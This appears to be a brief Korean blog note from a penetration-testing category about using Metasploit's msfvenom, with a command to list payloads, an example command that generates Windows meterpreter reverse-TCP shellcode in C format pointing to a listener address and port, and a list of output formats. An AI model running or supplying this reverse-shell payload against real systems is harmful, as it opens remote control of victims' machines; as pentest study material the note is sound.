본문 바로가기

보안/침투

Metasploit msfvenom 통한 쉘코드 생성

msfvenom

메타스플로잇 프레임워크에 포함되어있는 도구. exploit 실행 파일, 쉘코드 생성 가능

// payloads 관련 모듈 리스트 확인 가능
msfvenom -l payloads

 

[example] 리버스 쉘을 위한 쉘코드 작성 (출력 형식 : c언어)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=123.123.123.123 LPORT=4444 -f c

 

format list (-f 옵션)

실행 가능한 포맷 변환 가능한 포맷
 asp 
 aspx 
 aspx-exe 
 axis2   
 dll 
 ducky-script-psh 
 elf 
 elf-so  
 exe 
 exe-only 
 exe-service 
 exe-small   
 hta-psh 
 jar 
 jsp 
 loop-vbs 
 macho   
 msi 
 msi-nouac   
 osx-app
 psh
 psh-cmd
 psh-net
 psh-reflection
 python-reflection
 vba
 vba-exe
 vba-psh
 vbs
 war
 base32
 base64
 bash
 c
 csharp
 dw
 dword
 go
 golang
 hex
 java
 js_be
 js_le
 nim
 nimlang
 num
 perl
 pl
 powershell
 ps1
 py
 python
 raw
 rb
 ruby
 rust
 rustlang
 sh
 vbapplication
 vbscript

'보안 > 침투' 카테고리의 다른 글

reverse shell - fifo  (0) 2023.09.19